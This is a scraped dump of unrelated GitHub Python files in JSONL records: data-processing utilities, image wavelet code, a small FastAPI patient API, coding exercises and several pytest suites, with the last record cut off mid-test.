load_project_info_dynamic(filename: str) -> pd.DataFrame:\n \"\"\"\n The function loads data from a csv file into a pandas dataframe.\n If not file exists, it will be initialized.\n\n Parameters\n ----------\n filename: str\n \"\"\"\n\n if os.path.isfile(filename):\n logger.info(f\"file {filename} exists. Init from this file.\")\n df = pd.read_csv(filename, index_col=\"idx\")\n else:\n columns = [\n \"project_id\",\n \"progress\",\n \"number_of_users\",\n \"number_of_results\",\n \"number_of_results_progress\",\n \"day\",\n ]\n df = pd.DataFrame(index=[], columns=columns)\n df[\"project_id\"].astype(\"str\")\n\n return df\n\n\ndef save_projects(\n filename: str, df: pd.DataFrame, df_dynamic: pd.DataFrame\n) -> pd.DataFrame:\n \"\"\"\n The function merges the dataframes for static and dynamic project information\n and then save the result as csv file.\n Additionally, two geojson files are generated using\n (a) the geometry of the projects and\n (b) the centroid of the projects.\n\n Parameters\n ----------\n filename: str\n df: pd.DataFrame\n df_dynamic: pd.DataFrame\n \"\"\"\n\n projects_df = df.merge(\n df_dynamic, left_on=\"project_id\", right_on=\"project_id\", how=\"left\"\n )\n projects_df.to_csv(filename, index_label=\"idx\", line_terminator=\"\\n\")\n logger.info(f\"saved projects: {filename}\")\n geojson_functions.csv_to_geojson(filename, \"geom\")\n geojson_functions.csv_to_geojson(filename, \"centroid\")\n\n return projects_df\n","repo_name":"mapswipe/python-mapswipe-workers","sub_path":"mapswipe_workers/mapswipe_workers/generate_stats/overall_stats.py","file_name":"overall_stats.py","file_ext":"py","file_size_in_byte":5453,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"5"} +{"seq_id":"21751177124","text":"keys = int(input())\nmax_press = list(map(int, input().split()))\ntotal_press = int(input())\npresses = list(map(int, input().split()))\na_dict = {index: i for index, i in enumerate(max_press, 1)}\n\nfor press in presses:\n a_dict[press] -= 1\n\nfor key in a_dict:\n if a_dict[key] < 0:\n print('YES')\n else:\n print('NO')\n","repo_name":"BatarchiZ/HSE_Python_YC6","sub_path":"7.py","file_name":"7.py","file_ext":"py","file_size_in_byte":334,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"39286563414","text":"# -*- coding: utf-8 -*-\nimport numpy as np\nfrom skimage import restoration\nfrom .helper import convertTo\n\n\n__all__ = ['aTrousTransform', 'iATrousTransform', 'rlDeconvolve',\n 'starletKernel']\n\n\ndef rlDeconvolve(img_data, psfFunction, psfParam, psfWidth=16, iterations=30):\n # skimage.restoration.richardson_lucy accepts float64 as input\n img_data_64 = convertTo(img_data, np.float64)\n # Set up PSF\n xx = np.linspace(-psfWidth, psfWidth, 2 * psfWidth + 1, dtype=np.float64)\n X, Y = np.meshgrid(xx, xx)\n pos = np.array([X.ravel(), Y.ravel()]).T\n psf = psfFunction(pos, 1.0, 0.0, 0.0, psfParam[0], psfParam[1],\n psfParam[2], psfParam[3], 0.0).reshape(2 * psfWidth + 1,\n 2 * psfWidth + 1)\n # Deconvolve\n if img_data_64.ndim != 3:\n img_deconv = restoration.richardson_lucy(img_data_64, psf,\n iterations=iterations)\n else:\n img_deconv = np.empty(img_data_64.shape)\n for i in range(img_data_64.shape[-1]):\n img_deconv[:, :, i] = restoration.richardson_lucy(\n img_data_64[:, :, i], psf, iterations=iterations)\n return img_deconv\n\n\ndef starletKernel(level):\n '''\n B3-spline kernel for starlet transformation. The scaling function is\n \\phi(x) = 1/12 (|x-2|^3-4|x-1|^3+6|x|^3-4|x+1|^3+|x+2|^3)\n Thus the coeffcient for convolution is (1/16, 1/4, 3/8, 1/4, 1/16)\n\n Parameters\n ----------\n level: unsigned integer\n Level of the wavelet transformation. The distance between each\n coefficient is 2 ** level.\n\n Returns\n -------\n numpy.ndarray of shape (4 * 2 ** level + 1) and dtype == numpy.float32\n The kernel for convolution\n\n Raises\n ------\n None\n '''\n step = 2 ** level\n k_length = 4 * step + 1\n kernel = np.zeros((k_length), dtype=np.float64)\n kernel[0] = 1.0 / 16.0\n kernel[step] = 4.0 / 16.0\n kernel[2 * step] = 6.0 / 16.0\n kernel[3 * step] = 4.0 / 16.0\n kernel[-1] = 1.0 / 16.0\n return kernel\n\n\ndef _convValid(x, y):\n return np.convolve(x, y, 'valid')\n\n\ndef _convolve2DHDR(img_data, kernel):\n '''\n High dynamic range 2D convolve. Instead of FFT, this function use\n direct convolve, which is considerably slower. However, it is still\n suprisingly fast.\n '''\n to_fill_length = int(np.floor(len(kernel) / 2))\n np_conv2d = np.vectorize(_convValid, signature='(n),(m)->(k)')\n # Row convolve\n tmp_row = np.pad(img_data, ((0, 0), (to_fill_length, to_fill_length)),\n 'symmetric')\n row_conv = np_conv2d(tmp_row, kernel)\n # Column convolve\n tmp_col = row_conv.T\n tmp_col = np.pad(tmp_col, ((0, 0), (to_fill_length, to_fill_length)),\n 'symmetric')\n col_conv = np_conv2d(tmp_col, kernel)\n return col_conv.T\n\n\ndef aTrousTransform(img_data, kernelFunc, max_level=5):\n '''\n Algorithm a trous (aka stationary wavelet transform) for 2D image.\n Convolution is taken care of through OpenCV. Assume kernel is separable\n in 2-D and the kernels are the same.\n\n Parameters\n ----------\n img_data: 2D numpy.ndarray\n Input image data. Automatically converted to numpy.float32.\n kernelFunc: function\n Function with level as input and convolution kernel as return\n max_level: unsigned integer, default 5\n Maximum level to wavelet transform. Starts with 0.\n\n Returns\n -------\n List of numpy.ndarray\n List of coefficent and approximation (w_0, ... w_{max_level-1},\n c_{max_level})\n\n Raises\n ------\n None\n '''\n if img_data.dtype != np.float64:\n img_in = convertTo(img_data, np.float64)\n else:\n img_in = img_data\n img_out = None\n res = []\n for i in range(max_level):\n kernel = kernelFunc(i)\n img_out = _convolve2DHDR(img_in, kernel)\n res.append(img_in - img_out)\n img_in = img_out\n res.append(img_out)\n return res\n\n\ndef iATrousTransform(coeff, kernelFunc):\n '''\n Inverse a Trous transform.\n\n Parameters\n ----------\n coeff: list of numpy.ndarray\n List of coefficients from aTrousTransform\n\n Returns\n -------\n 2D numpy.ndarray\n Reconstructed image\n\n Raises\n ------\n None\n '''\n return np.sum(coeff, axis=0)\n\n\ndef msLinearTransform(img_data, img_mask, maxLevel, tList, iList, sList,\n transFunc=[aTrousTransform, iATrousTransform],\n kernelFunc=starletKernel):\n '''\n Multi-scale Linear Transform\n For noise reduction purpose, adapted from:\n Starck J-L, Bijaoui A, Murtagh F (1995) Multiresolution support applied\n to image filtering and deconvolution. CVGIP: Graph Models Image Process\n 57: 420-431\n\n Parameters\n ----------\n img_data: 2D numpy.ndarray\n Input image data. For colored image, extract its luminance channel and\n then feed into this function\n img_mask: 2D numpy.ndarray\n Input image mask\n maxLevel: int\n Maximum level of decomposition\n tList: numpy.array of float, length == maxLevel\n List of threshold for each level, if filtering is not needed, use 0.0\n iList: list of int, length == maxLevel\n List of iterations for each level, if filtering is not needed for\n certain level, use 0\n sList: list of float, length == maxLevel, every value between 0.0 and 1.0\n List of strength for each level, 0.0 for no modification, 1.0 for\n denoise data only, value in between for linear combination of both\n transFunc: list of functions, length == 2\n [Transform function, inverse transform function]\n kernelFunc: function\n Kernel function for wavelet transform\n\n Returns\n -------\n img_recon: 2D numpy.ndarray, same shape as img_data\n Denoised image\n\n Raises\n ------\n ValueError\n '''\n if len(tList) != maxLevel or len(iList) != maxLevel:\n raise ValueError(\"tList and iList must have length of maxLevel\")\n if img_data.ndim != 2:\n raise TypeError(\"img_data must be 2D. For colored image, extract\" +\n \" its luminance channel\")\n # Cast everything to everything to float64\n img_data_64 = convertTo(img_data, np.float64)\n img_mask_64 = convertTo(img_data, np.float64)\n # Estimate the relation between image space and frequency space\n # TODO: support look-up table for given transformation and kernel\n img_test = np.random.normal(0.0, 1.0, (2048, 2048))\n img_test_swt = transFunc[0](img_test, kernelFunc, maxLevel)\n noise_sigma_coeff = np.std(img_test_swt[:-1], axis=(1, 2))\n # Estimate noise of the image and determine filtering threshold\n img_swt = transFunc[0](img_data_64, kernelFunc, maxLevel)\n img_noise_sigma = np.std(img_swt[0]) / noise_sigma_coeff[0] * \\\n noise_sigma_coeff\n print(img_noise_sigma[0] / noise_sigma_coeff[0])\n thres_list = tList * img_noise_sigma\n # Iteration\n n = 0\n sol = np.zeros_like(img_data_64)\n err = np.zeros_like(img_data_64)\n while n < np.max(iList):\n err = img_data_64 - sol\n err_swt = transFunc[0](err, kernelFunc, maxLevel)\n # Filter each level except residual\n for i in range(maxLevel):\n if n < iList[i]:\n tf = np.logical_and(err_swt[i] > -thres_list[i],\n err_swt[i] < thres_list[i])\n err_swt[i][tf] *= (1.0 - img_mask_64[tf] * sList[i])\n # Reconstruct\n err_iswt = transFunc[1](err_swt, kernelFunc)\n sol += err_iswt\n n += 1\n return sol\n","repo_name":"chengxinlun/OpenAP","sub_path":"OpenAP/frequency.py","file_name":"frequency.py","file_ext":"py","file_size_in_byte":7661,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"18593036326","text":"from fastapi import FastAPI, Depends, HTTPException\nfrom fastapi.middleware.cors import CORSMiddleware\nfrom sqlalchemy.orm import Session\n\nfrom . import crud, models, schemas\nfrom .database import SessionLocal, engine\n\nmodels.Base.metadata.create_all(bind=engine)\n\napp = FastAPI()\n\norigins = [\n \"http://localhost\",\n \"http://localhost:8000\",\n \"http://localhost:3000\"\n]\n\napp.add_middleware(\n CORSMiddleware,\n allow_origins=origins,\n allow_credentials=False,\n allow_methods=[\"*\"],\n allow_headers=[\"*\"],\n)\n\n\ndef get_db():\n db = SessionLocal()\n try:\n yield db\n finally:\n db.close()\n\n@app.get(\"/\")\ndef read_root():\n return \"Hello!\"\n\n@app.get(\"/patients\", response_model=list[schemas.Patient])\ndef read_patients(skip: int = 0, limit: int = 10, db: Session = Depends(get_db)):\n patients = crud.read_patients(db, skip=skip, limit=limit)\n return patients\n\n@app.get(\"/patients/{patient_id}\", response_model=schemas.Patient)\ndef read_patients(patient_id: int, db: Session = Depends(get_db)):\n db_patient = crud.read_patient(db, patient_id=patient_id)\n if db_patient is None:\n raise HTTPException(status_code=404, detail=\"Paciente não encontrado.\")\n return db_patient\n\n@app.post(\"/patients\", response_model=schemas.Patient)\ndef create_patients(patient: schemas.CreatePatient, db: Session = Depends(get_db)):\n return crud.create_patient(db=db, patient=patient)\n\n@app.put(\"/patients/{patient_id}\")\ndef update_patients(patient: schemas.Patient, db: Session = Depends(get_db)):\n crud.update_patient(db, patient=patient)\n return patient\n\n@app.delete(\"/patients/{patient_id}\")\ndef delete_patients(patient_id: int, db: Session = Depends(get_db)):\n db_patient = crud.delete_patient(db, patient_id=patient_id)\n return db_patient","repo_name":"riangdasilva/patient-system","sub_path":"backend/app/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1794,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"5"} +{"seq_id":"4238489046","text":"from __future__ import annotations\nfrom typing import List\nimport time\nFLOATING_POINT_ACCURACY = 1.0e-6\n\nX = 0\nY = 1\nZ = 2\n\np1 = (0,0,0)\np1x = 0\np1y = 0\np2 = (1,1,1)\np2x = 1\np2y = 1\np3 = (0,2,0)\np3x = 0\np3y = 0\n\n\ndef triangleAreaXY(p1x,p1y,p2x,p2y,p3x,p3y) :\n \n a = abs(p1x*(p2y-p3y) +p2x*(p3y-p1y) +p3x*(p1y-p2y))/2.0\n return a\n\n\n# //if include_edge is false : if the point is on the edge, is NOT inside. \n# //if include_edge is true : if the point is on the edge, is inside. \ndef insideTriangleXY(px,py, include_edge : bool) -> bool :\n area = triangleAreaXY(p1x,p1y,p2x,p2y,p3x,p3y)\n area1 = triangleAreaXY(px,py,p2x,p2y,p3x,p3y)\n area2 = triangleAreaXY(p1x,p1y,px,py,p3x,p3y)\n area3 = triangleAreaXY(p1x,p1y,p2x,p2y,px,py)\n if not include_edge :\n if (area1 <= FLOATING_POINT_ACCURACY) or (area2 <= FLOATING_POINT_ACCURACY) or (area3 <= FLOATING_POINT_ACCURACY) :\n return False\n ins = (abs(area1+area2+area3) - area) <= (FLOATING_POINT_ACCURACY * area)\n return ins\n\n\nif __name__ == '__main__':\n start_ms = time.perf_counter()\n\n a = (0,1,2)\n ax = 0\n ay = 1\n for i in range(int(1e6)):\n insideTriangleXY(ax,ay, True )\n\n end_ms = time.perf_counter()\n print(f\"duration : {end_ms - start_ms}\")\n","repo_name":"windancert/line_triangle_projection","sub_path":"java_vs_python/testme2.py","file_name":"testme2.py","file_ext":"py","file_size_in_byte":1272,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"32119066576","text":"T = int(input())\n\ndef sol(testcases):\n ans = []\n for i in range(testcases):\n n = input()\n canList = [int(x) for x in str(input()).split()]\n result = sum(canList)\n if result %2 == 0:\n ans.append('NO')\n else:\n ans.append('YES')\n \n for i in range(len(ans)):\n print(ans[i])\n\nsol(T)\n","repo_name":"arjkashyap/competitive-coding","sub_path":"codechef/cndlove.py","file_name":"cndlove.py","file_ext":"py","file_size_in_byte":362,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"4516570301","text":"# Enter your code here. Read input from STDIN. Print output to STDOUT\n\nif __name__ == '__main__':\n nums = input()\n nums = nums.split(\" \")\n rows = int(nums[0])\n cols = int(nums[1])\n block = \".|.\"\n top = \"\"\n bottom = \"\"\n for i in range(rows//2):\n row = block.center(cols, \"-\")\n if i != 0:\n top += \"\\n\" + row\n else:\n top += row\n bottom = row + \"\\n\" + bottom\n block += \".|..|.\"\n \n print(top)\n print(\"WELCOME\".center(cols, \"-\"))\n print(bottom)","repo_name":"ThomasJRooney/practice","sub_path":"hackerrank/python/doormat.py","file_name":"doormat.py","file_ext":"py","file_size_in_byte":531,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"465860693","text":"from pyhecdss.pyhecdss import DSSFile\r\nimport unittest\r\nimport pytest\r\nimport pyhecdss\r\nimport numpy as np\r\nimport pandas as pd\r\nimport os\r\n\r\n\r\nclass TestPyDsUtilsBasic(unittest.TestCase):\r\n\r\n def cleanTempFiles():\r\n file_list = ['./test_rts1.dss',\r\n './test_rts1.dsc',\r\n './test_rts1.dsd',\r\n './test_its1.dss',\r\n './test_its1.dsc',\r\n './test_its1.dsd',\r\n './test.dsc',\r\n './test.dsd',\r\n './test.dsc',\r\n './test.dsd',\r\n './test.dsk',\r\n './test_offset.dss',\r\n './test_rts1.dss',\r\n './test2.dss',\r\n './testnew.dss']\r\n\r\n for file in file_list:\r\n try:\r\n os.remove(file)\r\n except OSError:\r\n pass\r\n\r\n @ classmethod\r\n def setupClass(cls):\r\n cls.cleanTempFiles()\r\n\r\n @ classmethod\r\n def tearDownClass(cls):\r\n cls.cleanTempFiles()\r\n\r\n def test_with(self):\r\n with pyhecdss.DSSFile('test1.dss') as d:\r\n assert len(d.read_catalog()) > 0\r\n\r\n def test_open_close(self):\r\n fname = \"test1.dss\"\r\n dssfile = pyhecdss.DSSFile(fname)\r\n dssfile.open()\r\n dssfile.close()\r\n\r\n def test_catalog(self):\r\n fname = \"test1.dss\"\r\n with pyhecdss.DSSFile(fname) as dssfile:\r\n dssfile.catalog()\r\n self.assertTrue(os.path.exists('test1.dsc'))\r\n self.assertTrue(os.path.exists('test1.dsd'))\r\n\r\n def test_read_ts(self):\r\n fname = \"test1.dss\"\r\n pathname = '/SAMPLE/SIN/WAVE/01JAN1990/15MIN/SAMPLE1/'\r\n sdate = '01JAN1990'\r\n edate = '31JAN1990'\r\n with pyhecdss.DSSFile(fname) as dssfile:\r\n values, units, periodtype = dssfile.read_rts(pathname, sdate, edate)\r\n self.assertEqual(units, 'UNIT-X')\r\n self.assertEqual(periodtype, 'INST-VAL')\r\n self.assertEqual(len(values['10JAN1990': '11JAN1990'].values),\r\n 96*2) # 96 15 min values per day\r\n # get series\r\n vseries = values.iloc[:, 0]\r\n self.assertTrue(abs(vseries.at['01JAN1990 0430']-(-0.42578)) < 1e-03)\r\n\r\n def test_write_ts(self):\r\n fname = \"test_rts1.dss\"\r\n pathname = '/TEST1/ONLY1/VANILLA//1DAY/JUST-ONES/'\r\n startDateStr, endDateStr = '01JAN1990 0100', '01JAN1991 0100'\r\n dtr = pd.date_range(startDateStr, endDateStr, freq='1D')\r\n df = pd.DataFrame(np.ones(len(dtr), 'd'), index=dtr)\r\n cunits, ctype = 'CCC', 'INST-VAL'\r\n with pyhecdss.DSSFile(fname, create_new=True) as dssfile2:\r\n dssfile2.write_rts(pathname, df, cunits, ctype)\r\n startDateStr = \"01JAN1990\"\r\n endDateStr = \"01JAN1991\"\r\n with pyhecdss.DSSFile(fname) as dssfile1:\r\n df2, cunits2, ctype2 = dssfile1.read_rts(pathname, startDateStr, endDateStr)\r\n self.assertEqual(ctype, ctype2)\r\n self.assertEqual(cunits, cunits2)\r\n self.assertEqual(1, df.iloc[0, 0])\r\n\r\n def test_write_rts_series(self):\r\n '''\r\n write_rts should work with pandas.Series as well.\r\n '''\r\n fname = \"test_rts1.dss\"\r\n pathname = '/TEST1/ONLY1/VANILLA//1DAY/JUST-ONES-SERIES/'\r\n startDateStr, endDateStr = '01JAN1990 0100', '01JAN1991 0100'\r\n dtr = pd.date_range(startDateStr, endDateStr, freq='1D')\r\n s = pd.Series(np.ones(len(dtr), 'd'), index=dtr)\r\n cunits, ctype = 'CCC', 'INST-VAL'\r\n with pyhecdss.DSSFile(fname, create_new=True) as dssfile2:\r\n dssfile2.write_rts(pathname, s, cunits, ctype)\r\n startDateStr = \"01JAN1990\"\r\n endDateStr = \"01JAN1991\"\r\n with pyhecdss.DSSFile(fname) as dssfile1:\r\n df2, cunits2, ctype2 = dssfile1.read_rts(pathname, startDateStr, endDateStr)\r\n self.assertEqual(ctype, ctype2)\r\n self.assertEqual(cunits, cunits2)\r\n self.assertEqual(1, s.iloc[0])\r\n\r\n def test_read_its(self):\r\n fname = \"test1.dss\"\r\n pathname = '/SAMPLE/ITS1/RANDOM/01JAN1990 - 01JAN1992/IR-YEAR/SAMPLE2/'\r\n with pyhecdss.DSSFile(fname) as dssfile:\r\n values, units, periodtype = dssfile.read_its(pathname)\r\n self.assertEqual(units, 'YYY')\r\n self.assertEqual(periodtype, 'INST-VAL')\r\n self.assertEqual(len(values), 3)\r\n # get series\r\n vseries = values.iloc[:, 0]\r\n self.assertTrue(abs(vseries.at['01JAN1990 0317']-1.5) < 1e-03)\r\n self.assertTrue(abs(vseries.at['05SEP1992 2349']-2.7) < 1e-03)\r\n\r\n def test_read_its_tw(self):\r\n # issue #26\r\n fname = \"test1.dss\"\r\n pathname = '/SAMPLE/ITS1/RANDOM/01JAN1990 0143 - 01JAN1992/IR-YEAR/SAMPLE2/'\r\n with pyhecdss.DSSFile(fname) as dssfile:\r\n values, units, periodtype = dssfile.read_its(pathname)\r\n self.assertEqual(units, 'YYY')\r\n self.assertEqual(periodtype, 'INST-VAL')\r\n self.assertEqual(len(values), 3)\r\n\r\n def test_write_its(self):\r\n fname = \"test1.dss\"\r\n pathname = '/TEST/ITS1/VANILLA//IR-YEAR/RANDOM/'\r\n ta = pd.to_datetime(['01apr1990', '05nov1991', '07apr1997'], format='%d%b%Y')\r\n df = pd.DataFrame([0.5, 0.6, 0.7], index=ta, columns=[\"random\"])\r\n cunits, ctype = 'CCC', 'INST-VAL'\r\n with pyhecdss.DSSFile(fname) as dssfile2:\r\n dssfile2.write_its(pathname, df, cunits, ctype)\r\n with pyhecdss.DSSFile(fname) as dssfile1:\r\n df2, cunits2, ctype2 = dssfile1.read_its(pathname, \"01JAN1990\", \"01JAN1998\")\r\n self.assertEqual(ctype, ctype2)\r\n self.assertEqual(cunits, cunits2)\r\n self.assertEqual(df2.iloc[0, 0], df.iloc[0, 0])\r\n self.assertEqual(df2.iloc[1, 0], df.iloc[1, 0])\r\n self.assertEqual(df2.iloc[2, 0], df.iloc[2, 0])\r\n\r\n def test_write_its_series(self):\r\n fname = \"test1.dss\"\r\n pathname = '/TEST/ITS1/VANILLA//IR-YEAR/RANDOM/'\r\n ta = pd.to_datetime(['01apr1990', '05nov1991', '07apr1997'], format='%d%b%Y')\r\n df = pd.Series([0.5, 0.6, 0.7], index=ta)\r\n cunits, ctype = 'CCC', 'INST-VAL'\r\n with pyhecdss.DSSFile(fname) as dssfile2:\r\n dssfile2.write_its(pathname, df, cunits, ctype)\r\n with pyhecdss.DSSFile(fname) as dssfile1:\r\n df2, cunits2, ctype2 = dssfile1.read_its(pathname, \"01JAN1990\", \"01JAN1998\")\r\n self.assertEqual(ctype, ctype2)\r\n self.assertEqual(cunits, cunits2)\r\n self.assertEqual(df2.iloc[0, 0], df.iloc[0])\r\n self.assertEqual(df2.iloc[1, 0], df.iloc[1])\r\n self.assertEqual(df2.iloc[2, 0], df.iloc[2])\r\n\r\n def test_read_catalog(self):\r\n fname = \"test1.dss\"\r\n with pyhecdss.DSSFile(fname) as dssfile:\r\n df = dssfile.read_catalog()\r\n self.assertTrue(len(df) >= 1)\r\n\r\n def test_get_pathnames(self):\r\n fname = \"test1.dss\"\r\n with pyhecdss.DSSFile(fname) as dssfile:\r\n pathnames = dssfile.get_pathnames()\r\n self.assertTrue(len(pathnames) > 0)\r\n\r\n def test_version(self):\r\n fname = \"test1.dss\"\r\n cver, iver = pyhecdss.get_version(fname)\r\n self.assertEqual(6, iver)\r\n self.assertEqual('6-VE', cver)\r\n\r\n def test_set_message_level(self):\r\n fname = \"test1.dss\"\r\n print(\"No easy way to check automatically. Just look at screen and see if lot of messages are printed?\")\r\n pyhecdss.set_message_level(10)\r\n with pyhecdss.DSSFile(fname) as d1:\r\n d1.close()\r\n print('No easy way to check automatically. Just look at screen and no DSS messages should be printed')\r\n pyhecdss.set_message_level(0)\r\n with pyhecdss.DSSFile(fname) as d1:\r\n d1.close()\r\n\r\n def test_except_on_bad_path(self):\r\n fname = \"test1.dss\"\r\n dssfile = pyhecdss.DSSFile(fname)\r\n pathname = '/SAMPLE/INVALID_MARKER/WAVE/01JAN1990/15MIN/SAMPLE1/'\r\n sdate = '01JAN1990'\r\n edate = '31JAN1990'\r\n # changed to a debugging level message so no error is now raised on missing pathname\r\n # values,units,periodtype=dssfile.read_rts(pathname,sdate,edate)\r\n\r\n def test_missing_dir(self):\r\n '''\r\n missing directory in filename causes crash. So check before trying to open\r\n '''\r\n fname = 'testnew.dss'\r\n if os.path.exists(fname):\r\n os.remove(fname)\r\n with pyhecdss.DSSFile(fname, create_new=True) as d:\r\n d.close()\r\n assert os.path.exists(fname)\r\n with pytest.raises(FileNotFoundError):\r\n fname2 = 'no_such_dir/testnew.dss'\r\n d = pyhecdss.DSSFile(fname2)\r\n d.close()\r\n\r\n def test_num_values_in_interval(self):\r\n fname = 'testnew.dss'\r\n if os.path.exists(fname):\r\n os.remove(fname)\r\n with pyhecdss.DSSFile(fname, create_new=True) as d:\r\n d.close()\r\n # only checking if values are greater than expected, HECLIB will return the exact number of values found\r\n assert DSSFile.num_values_in_interval('01JAN2000', '01FEB2000', '1DAY') > 31\r\n assert DSSFile.num_values_in_interval('01JAN2000', '01FEB2000', '1MON') > 1\r\n assert DSSFile.num_values_in_interval('01JAN2000', '01FEB2000', '1YEAR') > 0\r\n\r\n\r\nif __name__ == '__main__':\r\n unittest.main()\r\n","repo_name":"CADWRDeltaModeling/pyhecdss","sub_path":"tests/test_pyhecdss.py","file_name":"test_pyhecdss.py","file_ext":"py","file_size_in_byte":9411,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"5"} +{"seq_id":"17681892973","text":"from typing import KeysView\nimport pytest\n\nfrom layerstack.args import ArgMode, Arg, Kwarg, ArgList, KwargDict, get_short_name\n\n\ndef test_arglist_creation():\n # Variants that should work\n args = ArgList()\n\n arg1 = Arg('pv_penetration',parser=float)\n arg2 = Arg('house_size_threshold',parser=float,\n description='minimum size in ft2 for house to get pv')\n \n args = ArgList([arg1])\n args = ArgList([arg1,arg2])\n assert len(args) == 2, \"Expected to create ArgList with two items, but have {}.\".format(len(args))\n assert args.mode == ArgMode.DESC\n\n # Variants that should not work\n with pytest.raises(Exception):\n ArgList(arg1)\n with pytest.raises(Exception):\n ArgList(arg1,arg2)\n\n\ndef test_kwarg_creation():\n # Variants that should work\n kwargs = KwargDict()\n kwargs['max_pv_systems'] = Kwarg(parser=int,description='Maximum number of PV systems to install.')\n kwargs['fix_tap_changers'] = Kwarg(parser=bool,description='Whether to fix tap changer positions',\n action='store_true',default=False)\n kwargs['change_rate'] = Kwarg(parser=float,description=\"Rate of change (fraction)\",\n default=0.01)\n assert len(kwargs) == 3\n assert kwargs['max_pv_systems'].name == 'max_pv_systems'\n\n kwargs = KwargDict([('max_pv',kwargs['max_pv_systems']),\n ('fix_taps',kwargs['fix_tap_changers']),\n ('change-rate', kwargs['change_rate'])])\n assert len(kwargs) == 3\n assert kwargs['max_pv'].name == 'max_pv'\n assert kwargs['max_pv'].get_name() == 'max_pv'\n assert kwargs['change-rate'].name == 'change-rate'\n assert kwargs['change-rate'].get_name() == 'change_rate'\n assert kwargs['change-rate'].get_name(cleaned=False) == 'change-rate'\n\n with pytest.raises(Exception):\n KwargDict(kwargs['max_pv'])\n\n\ndef test_get_short_name():\n short_names = ['r', 'd', 'h']\n\n assert get_short_name('dredge', short_names=short_names) == 'dr'\n assert get_short_name('rude-awakening', short_names=short_names) == 'ra'\n assert get_short_name('recharge_area', short_names=short_names) == 'rea'\n","repo_name":"Smart-DS/layerstack","sub_path":"layerstack/tests/test_args_kwargs.py","file_name":"test_args_kwargs.py","file_ext":"py","file_size_in_byte":2197,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"5"} +{"seq_id":"38811162595","text":"import re\n\nimport pytest\n\nfrom datashuttle.configs.canonical_tags import tags\nfrom datashuttle.utils import formatting, utils\n\n\nclass TestUnit:\n \"\"\"\n Currently contains misc. unit tests.\n \"\"\"\n\n @pytest.mark.parametrize(\n \"underscore_position\", [\"left\", \"right\", \"both\", \"none\"]\n )\n @pytest.mark.parametrize(\n \"key\", [tags(\"date\"), tags(\"time\"), tags(\"datetime\")]\n )\n def test_datetime_string_replacement(self, key, underscore_position):\n \"\"\"\n Test the function that replaces @DATE, @TIME@ or @DATETIME@\n keywords with the date / time / datetime. Also, it will\n pre/append underscores to the tags if they are not\n already there (e.g if user input \"sub-001@DATE\").\n \"\"\"\n start = \"sub-001\"\n end = \"other-tag\"\n name = self.make_name(key, underscore_position, start, end)\n\n if key == tags(\"date\"):\n regex = re.compile(rf\"{start}_date-\\d\\d\\d\\d\\d\\d\\d\\d_{end}\")\n elif key == tags(\"time\"):\n regex = re.compile(rf\"{start}_time-\\d\\d\\d\\d\\d\\d_{end}\")\n elif key == tags(\"datetime\"):\n regex = re.compile(\n rf\"{start}_date-\\d\\d\\d\\d\\d\\d\\d\\d_time-\\d\\d\\d\\d\\d\\d_{end}\"\n )\n\n name_list = [name]\n formatting.update_names_with_datetime(name_list)\n\n assert re.search(regex, name_list[0]) is not None\n\n @pytest.mark.parametrize(\n \"prefix_and_names\",\n [\n [\"sub\", \"sub 001\"],\n [\"sub\", [\"sub 001\"]],\n [\"ses\", [\"ses- 001\", \"ses-002\"]],\n ],\n )\n def test_spaces_in_format_names(self, prefix_and_names):\n prefix, names = prefix_and_names\n with pytest.raises(BaseException) as e:\n formatting.format_names(names, prefix)\n\n assert str(e.value) == \"sub or ses names cannot include spaces.\"\n\n @pytest.mark.parametrize(\"prefix\", [\"sub\", \"ses\"])\n def test_process_to_keyword_in_sub_input(self, prefix):\n \"\"\" \"\"\"\n results = formatting.update_names_with_range_to_flag(\n [f\"{prefix}-001\", f\"{prefix}-01{tags('to')}123\"], prefix\n )\n assert results == [f\"{prefix}-001\"] + [\n f\"{prefix}-{str(num).zfill(2)}\" for num in range(1, 124)\n ]\n\n results = formatting.update_names_with_range_to_flag(\n [f\"{prefix}-1{tags('to')}3_hello-world\"], prefix\n )\n assert results == [\n f\"{prefix}-1_hello-world\",\n f\"{prefix}-2_hello-world\",\n f\"{prefix}-3_hello-world\",\n ]\n\n results = formatting.update_names_with_range_to_flag(\n [\n f\"{prefix}-01{tags('to')}3_hello\",\n f\"{prefix}-4{tags('to')}005_goodbye\",\n f\"{prefix}-006{tags('to')}0007_hello\",\n ],\n prefix,\n )\n\n assert results == [\n f\"{prefix}-01_hello\",\n f\"{prefix}-02_hello\",\n f\"{prefix}-03_hello\",\n f\"{prefix}-004_goodbye\",\n f\"{prefix}-005_goodbye\",\n f\"{prefix}-0006_hello\",\n f\"{prefix}-0007_hello\",\n ]\n\n @pytest.mark.parametrize(\"prefix\", [\"sub\", \"ses\"])\n @pytest.mark.parametrize(\n \"bad_input\",\n [\n f\"1{tags('to')}2\",\n f\"prefix-1{tags('to')}_date\",\n f\"prefix-@01{tags('to')}02\",\n f\"prefix-01{tags('to')}1M1\",\n ],\n )\n def test_process_to_keyword_bad_input_raises_error(\n self, prefix, bad_input\n ):\n bad_input = bad_input.replace(\"prefix\", prefix)\n\n with pytest.raises(BaseException) as e:\n formatting.update_names_with_range_to_flag([bad_input], prefix)\n\n assert (\n str(e.value)\n == f\"The name: {bad_input} is not in required format for {tags('to')} keyword. \"\n f\"The start must be be {prefix}-{tags('to')}).\"\n )\n\n def test_formatting_check_dashes_and_underscore_alternate_correctly(self):\n \"\"\"\"\"\"\n all_names = [\"sub_001_date-010101\"]\n with pytest.raises(BaseException) as e:\n formatting.check_dashes_and_underscore_alternate_correctly(\n all_names\n )\n\n assert (\n str(e.value)\n == \"The first delimiter of 'sub' or 'ses' must be dash not underscore e.g. sub-001.\"\n 